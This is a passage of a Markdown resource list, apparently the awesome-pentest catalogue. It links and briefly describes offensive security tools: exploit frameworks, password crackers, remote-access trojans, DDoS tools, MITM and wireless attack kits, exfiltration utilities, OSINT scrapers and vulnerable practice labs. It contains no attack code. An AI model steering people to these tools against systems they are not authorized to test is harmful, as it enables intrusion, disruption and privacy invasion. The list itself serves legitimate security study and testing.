[tgcd](http://tgcd.sourceforge.net/) - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.\n* [QueenSono](https://github.com/ariary/QueenSono) - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case).\n\n## Exploit Development Tools\n\nSee also *[Reverse Engineering Tools](#reverse-engineering-tools)*.\n\n* [Magic Unicorn](https://github.com/trustedsec/unicorn) - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or `certutil` (using fake certificates).\n* [Pwntools](https://github.com/Gallopsled/pwntools) - Rapid exploit development framework built for use in CTFs.\n* [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB.\n* [Wordpress Exploit Framework](https://github.com/rastating/wordpress-exploit-framework) - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.\n\n## File Format Analysis Tools\n\n* [ExifTool](https://www.sno.phy.queensu.ca/~phil/exiftool/) - Platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.\n* [Hachoir](https://hachoir.readthedocs.io/) - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.\n* [Kaitai Struct](http://kaitai.io/) - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.\n* [peepdf](https://eternal-todo.com/tools/peepdf-pdf-analysis-tool) - Python tool to explore PDF files in order to find out if the file can be harmful or not.\n* [Veles](https://codisec.com/veles/) - Binary data visualization and analysis tool.\n\n## GNU/Linux Utilities\n\n* [Hwacha](https://github.com/n00py/Hwacha) - Post-exploitation tool to quickly execute payloads via SSH on one or more Linux systems simultaneously.\n* [Linux Exploit Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.\n* [Lynis](https://cisofy.com/lynis/) - Auditing tool for UNIX-based systems.\n* [checksec.sh](https://www.trapkit.de/tools/checksec.html) - Shell script designed to test what standard Linux OS and PaX security features are being used.\n\n## Hash Cracking Tools\n\n* [BruteForce Wallet](https://github.com/glv2/bruteforce-wallet) - Find the password of an encrypted wallet file (i.e. `wallet.dat`).\n* [CeWL](https://digi.ninja/projects/cewl.php) - Generates custom wordlists by spidering a target's website and collecting unique words.\n* [duplicut](https://github.com/nil0x42/duplicut) - Quickly remove duplicates, without changing the order, and without getting OOM on huge wordlists.\n* [GoCrack](https://github.com/fireeye/gocrack) - Management Web frontend for distributed password cracking sessions using hashcat (or other supported tools) written in Go.\n* [Hashcat](http://hashcat.net/hashcat/) - The more fast hash cracker.\n* [hate_crack](https://github.com/trustedsec/hate_crack) - Tool for automating cracking methodologies through Hashcat.\n* [JWT Cracker](https://github.com/lmammino/jwt-cracker) - Simple HS256 JSON Web Token (JWT) token brute force cracker.\n* [John the Ripper](http://www.openwall.com/john/) - Fast password cracker.\n* [Rar Crack](http://rarcrack.sourceforge.net) - RAR bruteforce cracker.\n\n## Hex Editors\n\n* [Bless](https://github.com/bwrsandman/Bless) - High quality, full featured, cross-platform graphical hex editor written in Gtk#.\n* [Frhed](http://frhed.sourceforge.net/) - Binary file editor for Windows.\n* [Hex Fiend](http://ridiculousfish.com/hexfiend/) - Fast, open source, hex editor for macOS with support for viewing binary diffs.\n* [HexEdit.js](https://hexed.it) - Browser-based hex editing.\n* [Hexinator](https://hexinator.com/) - World's finest (proprietary, commercial) Hex Editor.\n* [hexedit](https://github.com/pixel/hexedit) - Simple, fast, console-based hex editor.\n* [wxHexEditor](http://www.wxhexeditor.org/) - Free GUI hex editor for GNU/Linux, macOS, and Windows.\n\n## Industrial Control and SCADA Systems\n\nSee also [awesome-industrial-control-system-security](https://github.com/hslatman/awesome-industrial-control-system-security).\n\n* [Industrial Exploitation Framework (ISF)](https://github.com/dark-lbp/isf) - Metasploit-like exploit framework based on routersploit designed to target Industrial Control Systems (ICS), SCADA devices, PLC firmware, and more.\n* [s7scan](https://github.com/klsecservices/s7scan) - Scanner for enumerating Siemens S7 PLCs on a TCP/IP or LLC network.\n\n## Intentionally Vulnerable Systems\n\nSee also [awesome-vulnerable](https://github.com/kaiiyer/awesome-vulnerable).\n\n### Intentionally Vulnerable Systems as Docker Containers\n\n* [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/) - `docker pull citizenstig/dvwa`.\n* [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--) - `docker pull bkimminich/juice-shop`.\n* [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) - `docker pull citizenstig/nowasp`.\n* [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) - `docker-compose build && docker-compose up`.\n* [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) - `docker pull ismisepaul/securityshepherd`.\n* [OWASP WebGoat Project 7.1 docker image](https://hub.docker.com/r/webgoat/webgoat-7.1/) - `docker pull webgoat/webgoat-7.1`.\n* [OWASP WebGoat Project 8.0 docker image](https://hub.docker.com/r/webgoat/webgoat-8.0/) - `docker pull webgoat/webgoat-8.0`.\n* [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/) - `docker pull hmlio/vaas-cve-2014-0160`.\n* [Vulnerability as a service: SambaCry](https://hub.docker.com/r/vulnerables/cve-2017-7494/) - `docker pull vulnerables/cve-2017-7494`.\n* [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/) - `docker pull hmlio/vaas-cve-2014-6271`.\n* [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/) - `docker pull wpscanteam/vulnerablewordpress`.\n\n## Lock Picking\n\nSee [awesome-lockpicking](https://github.com/fabacab/awesome-lockpicking).\n\n## macOS Utilities\n\n* [Bella](https://github.com/kdaoudieh/Bella) - Pure Python post-exploitation data mining and remote administration tool for macOS.\n* [EvilOSX](https://github.com/Marten4n6/EvilOSX) - Modular RAT that uses numerous evasion and exfiltration techniques out-of-the-box.\n\n## Multi-paradigm Frameworks\n\n* [Armitage](http://fastandeasyhacking.com/) - Java-based GUI front-end for the Metasploit Framework.\n* [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.\n* [Decker](https://github.com/stevenaldinger/decker) - Penetration testing orchestration and automation framework, which allows writing declarative, reusable configurations capable of ingesting variables and using outputs of tools it has run as inputs to others.\n* [Faraday](https://github.com/infobyte/faraday) - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.\n* [Metasploit](https://www.metasploit.com/) - Software for offensive security teams to help verify vulnerabilities and manage security assessments.\n* [Pupy](https://github.com/n1nj4sec/pupy) - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.\n\n## Network Tools\n\n* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - Swiss army knife for pentesting networks.\n* [IKEForce](https://github.com/SpiderLabs/ikeforce) - Command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.\n* [Intercepter-NG](http://sniff.su/) - Multifunctional network toolkit.\n* [Legion](https://github.com/GoVanguard/legion) - Graphical semi-automated discovery and reconnaissance framework based on Python 3 and forked from SPARTA.\n* [Network-Tools.com](http://network-tools.com/) - Website offering an interface to numerous basic network utilities like `ping`, `traceroute`, `whois`, and more.\n* [Ncrack](https://nmap.org/ncrack/) - High-speed network authentication cracking tool built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.\n* [Praeda](http://h.foofus.net/?page_id=218) - Automated multi-function printer data harvester for gathering usable data during security assessments.\n* [Printer Exploitation Toolkit (PRET)](https://github.com/RUB-NDS/PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.\n* [SPARTA](https://sparta.secforce.com/) - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.\n* [SigPloit](https://github.com/SigPloiter/SigPloit) - Signaling security testing framework dedicated to telecom security for researching vulnerabilites in the signaling protocols used in mobile (cellular phone) operators.\n* [Smart Install Exploitation Tool (SIET)](https://github.com/Sab0tag3d/SIET) - Scripts for identifying Cisco Smart Install-enabled switches on a network and then manipulating them.\n* [THC Hydra](https://github.com/vanhauser-thc/thc-hydra) - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.\n* [Tsunami](https://github.com/google/tsunami-security-scanner) - General purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.\n* [Zarp](https://github.com/hatRiot/zarp) - Network attack tool centered around the exploitation of local networks.\n* [dnstwist](https://github.com/elceef/dnstwist) - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.\n* [dsniff](https://www.monkey.org/~dugsong/dsniff/) - Collection of tools for network auditing and pentesting.\n* [impacket](https://github.com/CoreSecurity/impacket) - Collection of Python classes for working with network protocols.\n* [pivotsuite](https://github.com/RedTeamOperations/PivotSuite) - Portable, platform independent and powerful network pivoting toolkit.\n* [routersploit](https://github.com/reverse-shell/routersploit) - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.\n* [rshijack](https://github.com/kpcyrd/rshijack) - TCP connection hijacker, Rust rewrite of `shijack`.\n\n### DDoS Tools\n\n* [Anevicon](https://github.com/rozgo/anevicon) - Powerful UDP-based load generator, written in Rust.\n* [D(HE)ater](https://github.com/Balasys/dheater) - D(HE)ater sends forged cryptographic handshake messages to enforce the Diffie-Hellman key exchange.\n* [HOIC](https://sourceforge.net/projects/high-orbit-ion-cannon/) - Updated version of Low Orbit Ion Cannon, has 'boosters' to get around common counter measures.\n* [Low Orbit Ion Canon (LOIC)](https://github.com/NewEraCracker/LOIC) - Open source network stress tool written for Windows.\n* [Memcrashed](https://github.com/649/Memcrashed-DDoS-Exploit) - DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API.\n* [SlowLoris](https://github.com/gkbrk/slowloris) - DoS tool that uses low bandwidth on the attacking side.\n* [T50](https://gitlab.com/fredericopissarra/t50/) - Faster network stress tool.\n* [UFONet](https://github.com/epsylon/ufonet) - Abuses OSI layer 7 HTTP to create/manage 'zombies' and to conduct different attacks using; `GET`/`POST`, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.\n\n### Network Reconnaissance Tools\n\n* [ACLight](https://github.com/cyberark/ACLight) - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.\n* [AQUATONE](https://github.com/michenriksen/aquatone) - Subdomain discovery tool utilizing various open sources producing a report that can be used as input to other tools.\n* [CloudFail](https://github.com/m0rtem/CloudFail) - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.\n* [DNSDumpster](https://dnsdumpster.com/) - Online DNS recon and search service.\n* [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.\n* [OWASP Amass](https://github.com/OWASP/Amass) - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.\n* [ScanCannon](https://github.com/johnnyxmas/ScanCannon) - POSIX-compliant BASH script to quickly enumerate large networks by calling `masscan` to quickly identify open ports and then `nmap` to gain details on the systems/services on those ports.\n* [XRay](https://github.com/evilsocket/xray) - Network (sub)domain discovery and reconnaissance automation tool.\n* [dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.\n* [dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper.\n* [dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS enumeration script.\n* [dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.\n* [fierce](https://github.com/mschwager/fierce) - Python3 port of the original `fierce.pl` DNS reconnaissance tool for locating non-contiguous IP space.\n* [netdiscover](https://github.com/netdiscover-scanner/netdiscover) - Network address discovery scanner, based on ARP sweeps, developed mainly for those wireless networks without a DHCP server.\n* [nmap](https://nmap.org/) - Free security scanner for network exploration & security audits.\n* [passivedns-client](https://github.com/chrislee35/passivedns-client) - Library and query tool for querying several passive DNS providers.\n* [passivedns](https://github.com/gamelinux/passivedns) - Network sniffer that logs all DNS server replies for use in a passive DNS setup.\n* [RustScan](https://github.com/rustscan/rustscan) - Lightweight and quick open-source port scanner designed to automatically pipe open ports into Nmap.\n* [scanless](https://github.com/vesche/scanless) - Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.\n* [smbmap](https://github.com/ShawnDEvans/smbmap) - Handy SMB enumeration tool.\n* [subbrute](https://github.com/TheRook/subbrute) - DNS meta-query spider that enumerates DNS records, and subdomains.\n* [zmap](https://zmap.io/) - Open source network scanner that enables researchers to easily perform Internet-wide network studies.\n\n### Protocol Analyzers and Sniffers\n\nSee also [awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools).\n\n* [Debookee](http://www.iwaxx.com/debookee/) - Simple and powerful network traffic analyzer for macOS.\n* [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework.\n* [Netzob](https://github.com/netzob/netzob) - Reverse engineering, traffic generation and fuzzing of communication protocols.\n* [Wireshark](https://www.wireshark.org/) - Widely-used graphical, cross-platform network protocol analyzer.\n* [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - Swiss army knife for network sniffing.\n* [sniffglue](https://github.com/kpcyrd/sniffglue) - Secure multithreaded packet sniffer.\n* [tcpdump/libpcap](http://www.tcpdump.org/) - Common packet analyzer that runs under the command line.\n\n### Network Traffic Replay and Editing Tools\n\n* [TraceWrangler](https://www.tracewrangler.com/) - Network capture file toolkit that can edit and merge `pcap` or `pcapng` files with batch editing features.\n* [WireEdit](https://wireedit.com/) - Full stack WYSIWYG pcap editor (requires a free license to edit packets).\n* [bittwist](http://bittwist.sourceforge.net/) - Simple yet powerful libpcap-based Ethernet packet generator useful in simulating networking traffic or scenario, testing firewall, IDS, and IPS, and troubleshooting various network problems.\n* [hping3](https://github.com/antirez/hping) - Network tool able to send custom TCP/IP packets.\n* [pig](https://github.com/rafael-santiago/pig) - GNU/Linux packet crafting tool.\n* [scapy](https://github.com/secdev/scapy) - Python-based interactive packet manipulation program and library.\n* [tcpreplay](https://tcpreplay.appneta.com/) - Suite of free Open Source utilities for editing and replaying previously captured network traffic.\n\n### Proxies and Machine-in-the-Middle (MITM) Tools\n\nSee also *[Intercepting Web proxies](#intercepting-web-proxies)*.\n\n* [BetterCAP](https://www.bettercap.org/) - Modular, portable and easily extensible MITM framework.\n* [Ettercap](http://www.ettercap-project.org) - Comprehensive, mature suite for machine-in-the-middle attacks.\n* [Habu](https://github.com/portantier/habu) - Python utility implementing a variety of network attacks, such as ARP poisoning, DHCP starvation, and more.\n* [Lambda-Proxy](https://github.com/puresec/lambda-proxy) - Utility for testing SQL Injection vulnerabilities on AWS Lambda serverless functions.\n* [MITMf](https://github.com/byt3bl33d3r/MITMf) - Framework for Man-In-The-Middle attacks.\n* [Morpheus](https://github.com/r00t-3xp10it/morpheus) - Automated ettercap TCP/IP Hijacking tool.\n* [SSH MITM](https://github.com/jtesta/ssh-mitm) - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.\n* [dnschef](https://github.com/iphelix/dnschef) - Highly configurable DNS proxy for pentesters.\n* [evilgrade](https://github.com/infobyte/evilgrade) - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.\n* [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH.\n* [oregano](https://github.com/nametoolong/oregano) - Python module that runs as a machine-in-the-middle (MITM) accepting Tor client requests.\n* [sylkie](https://dlrobertson.github.io/sylkie/) - Command line tool and library for testing networks for common address spoofing security vulnerabilities in IPv6 networks using the Neighbor Discovery Protocol.\n\n### Transport Layer Security Tools\n\n* [SSLyze](https://github.com/nabla-c0d3/sslyze) - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.\n* [crackpkcs12](https://github.com/crackpkcs12/crackpkcs12) - Multithreaded program to crack PKCS#12 files (`.p12` and `.pfx` extensions), such as TLS/SSL certificates.\n* [testssl.sh](https://github.com/drwetter/testssl.sh) - Command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.\n* [tls_prober](https://github.com/WestpointLtd/tls_prober) - Fingerprint a server's SSL/TLS implementation.\n\n### Wireless Network Tools\n\n* [Aircrack-ng](http://www.aircrack-ng.org/) - Set of tools for auditing wireless networks.\n* [Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) - Multi-use bash script for Linux systems to audit wireless networks.\n* [BoopSuite](https://github.com/MisterBianco/BoopSuite) - Suite of tools written in Python for wireless auditing.\n* [Bully](http://git.kali.org/gitweb/?p=packages/bully.git;a=summary) - Implementation of the WPS brute force attack, written in C.\n* [Cowpatty](https://github.com/joswr1ght/cowpatty) - Brute-force dictionary attack against WPA-PSK.\n* [Fluxion](https://github.com/FluxionNetwork/fluxion) - Suite of automated social engineering based WPA attacks.\n* [KRACK Detector](https://github.com/securingsam/krackdetector) - Detect and prevent KRACK attacks in your network.\n* [Kismet](https://kismetwireless.net/) - Wireless network detector, sniffer, and IDS.\n* [PSKracker](https://github.com/soxrok2212/PSKracker) - Collection of WPA/WPA2/WPS default algorithms, password generators, and PIN generators written in C.\n* [Reaver](https://code.google.com/archive/p/reaver-wps) - Brute force attack against WiFi Protected Setup.\n* [WiFi Pineapple](https://www.wifipineapple.com/) - Wireless auditing and penetration testing platform.\n* [WiFi-Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) - Framework for rogue Wi-Fi access point attack.\n* [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool.\n* [infernal-twin](https://github.com/entropy1337/infernal-twin) - Automated wireless hacking tool.\n* [krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) - WPA2 Krack attack scripts.\n* [pwnagotchi](https://github.com/evilsocket/pwnagotchi) - Deep reinforcement learning based AI that learns from the Wi-Fi environment and instruments BetterCAP in order to maximize the WPA key material captured.\n* [wifi-arsenal](https://github.com/0x90/wifi-arsenal) - Resources for Wi-Fi Pentesting.\n\n## Network Vulnerability Scanners\n\n* [celerystalk](https://github.com/sethsec/celerystalk) - Asynchronous enumeration and vulnerability scanner that \"runs all the tools on all the hosts\" in a configurable manner.\n* [kube-hunter](https://kube-hunter.aquasec.com/) - Open-source tool that runs a set of tests (\"hunters\") for security issues in Kubernetes clusters from either outside (\"attacker's view\") or inside a cluster.\n* [Nessus](https://www.tenable.com/products/nessus-vulnerability-scanner) - Commercial vulnerability management, configuration, and compliance assessment platform, sold by Tenable.\n* [Netsparker Application Security Scanner](https://www.netsparker.com/pricing/) - Application security scanner to automatically find security flaws.\n* [Nexpose](https://www.rapid7.com/products/nexpose/) - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.\n* [OpenVAS](http://www.openvas.org/) - Free software implementation of the popular Nessus vulnerability assessment system.\n* [Vuls](https://github.com/future-architect/vuls) - Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.\n\n### Web Vulnerability Scanners\n\n* [ACSTIS](https://github.com/tijme/angularjs-csti-scanner) - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.\n* [Arachni](http://www.arachni-scanner.com/) - Scriptable framework for evaluating the security of web applications.\n* [JCS](https://github.com/TheM4hd1/JCS) - Joomla Vulnerability Component Scanner with automatic database updater from exploitdb and packetstorm.\n* [Nikto](https://cirt.net/nikto2) - Noisy but fast black box web server and web application vulnerability scanner.\n* [SQLmate](https://github.com/UltimateHackers/sqlmate) - Friend of `sqlmap` that identifies SQLi vulnerabilities based on a given dork and (optional) website.\n* [SecApps](https://secapps.com/) - In-browser web application security testing suite.\n* [WPScan](https://wpscan.org/) - Black box WordPress vulnerability scanner.\n* [Wapiti](http://wapiti.sourceforge.net/) - Black box web application vulnerability scanner with built-in fuzzer.\n* [WebReaver](https://www.webreaver.com/) - Commercial, graphical web application vulnerability scanner designed for macOS.\n* [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.\n* [joomscan](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) - Joomla vulnerability scanner.\n* [skipfish](https://www.kali.org/tools/skipfish/) - Performant and adaptable active web application security reconnaissance tool.\n* [w3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework.\n\n## Online Resources\n\n### Online Operating Systems Resources\n\n* [DistroWatch.com's Security Category](https://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing, and keeping up to date with open source operating systems.\n\n### Online Penetration Testing Resources\n\n* [MITRE's Adversarial Tactics, Techniques & Common Knowledge (ATT&CK)](https://attack.mitre.org/) - Curated knowledge base and model for cyber adversary behavior.\n* [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - Free Offensive Security Metasploit course.\n* [Open Web Application Security Project (OWASP)](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.\n* [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.\n* [Penetration Testing Execution Standard (PTES)](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.\n* [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.\n* [XSS-Payloads](http://www.xss-payloads.com) - Resource dedicated to all things XSS (cross-site), including payloads, tools, games, and documentation.\n\n### Other Lists Online\n\n* [.NET Programming](https://github.com/quozd/awesome-dotnet) - Software framework for Microsoft Windows platform development.\n* [Infosec/hacking videos recorded by cooper](https://administraitor.video) - Collection of security conferences recorded by Cooper.\n* [Android Exploits](https://github.com/sundaysec/Android-Exploits) - Guide on Android Exploitation and Hacks.\n* [Android Security](https://github.com/ashishb/android-security-awesome) - Collection of Android security related resources.\n* [AppSec](https://github.com/paragonie/awesome-appsec) - Resources for learning about application security.\n* [Awesome Awesomness](https://github.com/bayandin/awesome-awesomeness) - The List of the Lists.\n* [Awesome Malware](https://github.com/fabacab/awesome-malware) - Curated collection of awesome malware, botnets, and other post-exploitation tools.\n* [Awesome Shodan Queries](https://github.com/jakejarvis/awesome-shodan-queries) - Awesome list of useful, funny, and depressing search queries for Shodan.\n* [AWS Tool Arsenal](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) - List of tools for testing and securing AWS environments.\n* [Blue Team](https://github.com/fabacab/awesome-cybersecurity-blueteam) - Awesome resources, tools, and other shiny things for cybersecurity blue teams.\n* [C/C++ Programming](https://github.com/fffaraz/awesome-cpp) - One of the main language for open source security tools.\n* [CTFs](https://github.com/apsdehal/awesome-ctf) - Capture The Flag frameworks, libraries, etc.\n* [Forensics](https://github.com/Cugu/awesome-forensics) - Free (mostly open source) forensic analysis tools and resources.\n* [Hacking](https://github.com/carpedm20/awesome-hacking) - Tutorials, tools, and resources.\n* [Honeypots](https://github.com/paralax/awesome-honeypots) - Honeypots, tools, components, and more.\n* [InfoSec § Hacking challenges](https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges) - Comprehensive directory of CTFs, wargames, hacking challenge websites, pentest practice lab exercises, and more.\n* [Infosec](https://github.com/onlurking/awesome-infosec) - Information security resources for pentesting, forensics, and more.\n* [JavaScript Programming](https://github.com/sorrycc/awesome-javascript) - In-browser development and scripting.\n* [Kali Linux Tools](http://tools.kali.org/tools-listing) - List of tools present in Kali Linux.\n* [Node.js Programming by @sindresorhus](https://github.com/sindresorhus/awesome-nodejs) - Curated list of delightful Node.js packages and resources.\n* [Pentest Cheat Sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Awesome Pentest Cheat Sheets.\n* [Python Programming by @svaksha](https://github.com/svaksha/pythonidae) - General Python programming.\n* [Python Programming by @vinta](https://github.com/vinta/awesome-python) - General Python programming.\n* [Python tools for penetration testers](https://github.com/dloss/python-pentest-tools) - Lots of pentesting tools are written in Python.\n* [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/) - An open-source inventory of tools, resources, CTF platforms and Operating Systems about CyberSecurity. ([Source](https://gitlab.com/rawsec/rawsec-cybersecurity-list))\n* [Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) - List of Awesome Red Teaming Resources.\n* [Ruby Programming by @Sdogruyol](https://github.com/Sdogruyol/awesome-ruby) - The de-facto language for writing exploits.\n* [Ruby Programming by @dreikanter](https://github.com/dreikanter/ruby-bookmarks) - The de-facto language for writing exploits.\n* [Ruby Programming by @markets](https://github.com/markets/awesome-ruby) - The de-facto language for writing exploits.\n* [SecLists](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists used during security assessments.\n* [SecTools](http://sectools.org/) - Top 125 Network Security Tools.\n* [Security Talks](https://github.com/PaulSec/awesome-sec-talks) - Curated list of security conferences.\n* [Security](https://github.com/sbilly/awesome-security) - Software, libraries, documents, and other resources.\n* [Serverless Security](https://github.com/puresec/awesome-serverless-security/) - Curated list of awesome serverless security resources such as (e)books, articles, whitepapers, blogs and research papers.\n* [Shell Scripting](https://github.com/alebcay/awesome-shell) - Command line frameworks, toolkits, guides and gizmos.\n* [YARA](https://github.com/InQuest/awesome-yara) - YARA rules, tools, and people.\n\n### Penetration Testing Report Templates\n\n* [Public Pentesting Reports](https://github.com/juliocesarfort/public-pentesting-reports) - Curated list of public penetration test reports released by several consulting firms and academic security groups.\n* [T&VS Pentesting Report Template](https://www.testandverification.com/wp-content/uploads/template-penetration-testing-report-v03.pdf) - Pentest report template provided by Test and Verification Services, Ltd.\n* [Web Application Security Assessment Report Template](http://lucideus.com/pdf/stw.pdf) - Sample Web application security assessment reporting template provided by Lucideus.\n\n## Open Sources Intelligence (OSINT)\n\nSee also [awesome-osint](https://github.com/jivoi/awesome-osint).\n\n* [DataSploit](https://github.com/upgoingstar/datasploit) - OSINT visualizer utilizing Shodan, Censys, Clearbit, EmailHunter, FullContact, and Zoomeye behind the scenes.\n* [Depix](https://github.com/beurtschipper/Depix) - Tool for recovering passwords from pixelized screenshots (by de-pixelating text).\n* [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is an Intelligence Gathering tool using Machine Learning.\n* [Intrigue](http://intrigue.io) - Automated OSINT & Attack Surface discovery framework with powerful API, UI and CLI.\n* [Maltego](http://www.maltego.com/) - Proprietary software for open sources intelligence and forensics.\n* [PacketTotal](https://packettotal.com/) - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Zeek and Suricata IDS signatures under the hood).\n* [Skiptracer](https://github.com/xillwillx/skiptracer) - OSINT scraping framework that utilizes basic Python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.\n* [Sn1per](https://github.com/1N3/Sn1per) - Automated Pentest Recon Scanner.\n* [Spiderfoot](http://www.spiderfoot.net/) - Multi-source OSINT automation tool with a Web UI and report visualizations.\n* [creepy](https://github.com/ilektrojohn/creepy) - Geolocation OSINT tool.\n* [gOSINT](https://github.com/Nhoya/gOSINT) - OSINT tool with multiple modules and a telegram scraper.\n* [image-match](https://github.com/ascribe/image-match) - Quickly search over billions of images.\n* [recon-ng](https://github.com/lanmaster53/recon-ng) - Full-featured Web Reconnaissance framework written in Python.\n* [sn0int](https://github.com/kpcyrd/sn0int) - Semi-automatic OSINT framework and package manager.\n* [Facebook Friend List Scraper](https://github.com/narkopolo/fb_friend_list_scraper) - Tool to scrape names and usernames from large friend lists on Facebook, without being rate limited.\n\n\n### Data Broker and Search Engine Services\n\n* [Hunter.io](https://hunter.io/) - Data broker providing a Web search interface for discovering the email addresses and other organizational details of a company.\n* [Threat Crowd](https://www.threatcrowd.org/) - Search engine for threats.\n* [Virus Total](https://www.virustotal.com/) - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.\n* [surfraw](https://github.com/kisom/surfraw) - Fast UNIX command line interface to a variety of popular WWW search engines.\n\n### Dorking tools\n\n* [BinGoo](https://github.com/Hood3dRob1n/BinGoo) - GNU/Linux bash based Bing and Google Dorking Tool.\n* [dorkbot](https://github.com/utiso/dorkbot) - Command-line tool to scan Google (or other) search results for vulnerabilities.\n* [github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan GitHub repos/organizations for potential sensitive information leaks.\n* [GooDork](https://github.com/k3170makan/GooDork) - Command line Google dorking tool.\n* [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - Database of Google dorks; can be used for recon.\n* [dork-cli](https://github.com/jgor/dork-cli) - Command line Google dork tool.\n* [dorks](https://github.com/USSCltd/dorks) - Google hack database automation tool.\n* [fast-recon](https://github.com/DanMcInerney/fast-recon) - Perform Google dorks against a domain.\n* [pagodo](https://github.com/opsdisk/pagodo) - Automate Google Hacking Database scraping.\n* [snitch](https://github.com/Smaash/snitch) - Information gathering via dorks.\n\n### Email search and analysis tools\n\n* [SimplyEmail](https://github.com/SimplySecurity/SimplyEmail) - Email recon made fast and easy.\n* [WhatBreach](https://github.com/Ekultek/WhatBreach) - Search email addresses and discover all known breaches that this email has been seen in, and download the breached database if it is publicly available.\n\n### Metadata harvesting and analysis\n\n* [FOCA (Fingerprinting Organizations with Collected Archives)](https://www.elevenpaths.com/labstools/foca/) - Automated document harvester that searches Google, Bing, and DuckDuckGo 